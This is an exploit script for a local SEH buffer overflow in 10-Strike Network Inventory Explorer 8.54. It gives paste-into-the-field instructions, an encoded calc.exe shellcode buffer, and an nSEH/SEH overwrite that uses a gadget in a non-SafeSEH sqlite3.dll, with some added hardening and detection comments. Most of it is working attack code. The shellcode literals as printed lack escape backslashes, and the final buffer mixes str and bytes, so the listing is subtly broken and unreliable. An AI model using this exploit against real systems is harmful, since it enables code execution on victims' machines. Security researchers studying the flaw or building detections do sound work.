# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- Go to 'Main' or 'Computers'
# 5.- Click upon 'Add'
# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
# 7.- Click "OK"
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/

import struct

# Payload used by this proof of concept. The author's generator note below
# says it is a windows/exec payload that starts calc.exe, encoded with
# x86/alpha_mixed, 448 bytes long.
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed
# Payload size: 448 bytes
#
# Defender note: calc.exe is only a visible marker that code ran in the
# context of the application. The observable on a host is the inventory
# application starting a child process it has no reason to start, which is a
# practical signal for an endpoint detection rule.
#
# The literals below are left exactly as published on this page.

buf = b""
buf += b"x89xe2xdaxc3xd9x72xf4x5fx57x59x49x49x49"
buf += b"x49x49x49x49x49x49x49x43x43x43x43x43x43"
buf += b"x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"
buf += b"x41x51x32x41x42x32x42x42x30x42x42x41x42"
buf += b"x58x50x38x41x42x75x4ax49x39x6cx78x68x4f"
buf += b"x72x47x70x63x30x57x70x63x50x4dx59x4bx55"
buf += b"x55x61x49x50x45x34x6cx4bx50x50x36x50x4c"
buf += b"x4bx53x62x56x6cx4ex6bx33x62x44x54x4ex6b"
buf += b"x42x52x54x68x74x4fx68x37x50x4ax56x46x44"
buf += b"x71x49x6fx6ex4cx45x6cx63x51x53x4cx53x32"
buf += b"x76x4cx61x30x5ax61x58x4fx74x4dx76x61x49"
buf += b"x57x59x72x5ax52x46x32x56x37x6cx4bx30x52"
buf += b"x36x70x6cx4bx73x7ax57x4cx4cx4bx30x4cx64"
buf += b"x51x70x78x7ax43x33x78x75x51x68x51x70x51"
buf += b"x4cx4bx76x39x55x70x67x71x38x53x4ex6bx31"
buf += b"x59x66x78x38x63x45x6ax51x59x6cx4bx70x34"
buf += b"x4cx4bx57x71x59x46x45x61x59x6fx6ex4cx4b"
buf += b"x71x58x4fx66x6dx76x61x5ax67x56x58x6bx50"
buf += b"x73x45x49x66x75x53x71x6dx4cx38x37x4bx43"
buf += b"x4dx67x54x63x45x4bx54x52x78x6cx4bx73x68"
buf += b"x37x54x56x61x69x43x73x56x4cx4bx76x6cx32"
buf += b"x6bx6ex6bx61x48x65x4cx55x51x7ax73x6cx4b"
buf += b"x54x44x4ex6bx43x31x6ax70x4bx39x32x64x35"
buf += b"x74x55x74x63x6bx43x6bx75x31x72x79x73x6a"
buf += b"x56x31x59x6fx4bx50x53x6fx51x4fx43x6ax4c"
buf += b"x4bx62x32x6ax4bx4cx4dx43x6dx63x5ax76x61"
buf += b"x6ex6dx6dx55x4ex52x53x30x77x70x55x50x76"
buf += b"x30x32x48x70x31x6cx4bx50x6fx6fx77x69x6f"
buf += b"x58x55x4dx6bx4ax50x58x35x4ex42x42x76x75"
buf += b"x38x6fx56x6fx65x4dx6dx6dx4dx59x6fx39x45"
buf += b"x77x4cx76x66x73x4cx76x6ax4dx50x79x6bx4d"
buf += b"x30x70x75x37x75x6fx4bx53x77x67x63x73x42"
buf += b"x72x4fx50x6ax55x50x56x33x39x6fx39x45x45"
buf += b"x33x30x61x50x6cx70x63x34x6ex42x45x51x68"
buf += b"x31x75x65x50x41x41"

# Two little-endian 32-bit values that the PoC places after the filler.
# Going by their names and the exploit title, they are meant to overwrite the
# "next record" pointer and the handler pointer of an SEH record on the stack.
nseh = struct.pack("<I", 0x909006EB)
# Author's note on the handler address:
# 0x61e8497a : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll)
#
# Hardening takeaway: per that note the PoC relies on a bundled sqlite3.dll
# that loads at a fixed address and is built without SafeSEH. Building bundled
# modules with /SAFESEH, /DYNAMICBASE and /NXCOMPAT, and enabling SEHOP on the
# host, removes the fixed target. The root fix is on the vendor side: bound
# the length of the 'Computer' field before copying it.
seh = struct.pack("<I", 0x61E8497A)

# Layout of the generated text: 211 filler characters, the two packed values,
# 20 more filler characters, the payload, then 200 repetitions of "xff" as
# trailing padding.
# NOTE(review): this expression mixes str literals with struct.pack() results
# and a b"" literal, so its behaviour depends on the interpreter version;
# confirm before relying on this listing.
buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "xff" * 200
# Write the result to poc.txt in the current working directory (text mode) and
# close the handle explicitly.
f = open ("poc.txt", "w")
f.write(buffer)
f.close()